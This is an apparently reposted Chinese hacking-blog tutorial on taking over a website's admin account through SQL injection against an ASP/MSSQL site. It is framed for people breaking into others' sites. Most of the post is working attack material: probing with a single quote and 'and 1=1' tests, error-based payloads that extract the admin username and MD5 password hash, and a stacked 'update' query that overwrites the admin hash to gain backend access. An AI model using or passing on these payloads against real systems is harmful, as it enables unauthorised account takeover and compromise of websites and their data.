记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

SQL注入直接修改管理员密码的MD5值

2015-02-22 13:35

经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。


可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?今天俺就整了个新


方法,直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)


测试如下:


http://www.xxx.com/news.asp?id=121


在地址后输入单引号,显示


Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’


字符串 ’’’ 之前有未闭合的引号


/news/tmdws.asp,行63


说明没有过滤单引号且数据库是MSSQL.


and 1=1正常。and 1=2出错。肯定存在注入


接着输入


http://www.xxx.com/news.asp?id=1 or admin_user in (select id from admin)


得到帐号为:admin


http://www.xxx.com/news.asp?id=121 or admin_password in (select id from admin)


得到密码为:a4716077c2ba075c


接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433


命令如下 :


;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–


这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的。


知识来源: www.hack1996.com/post/10.html

阅读:252758 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“SQL注入直接修改管理员密码的MD5值”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云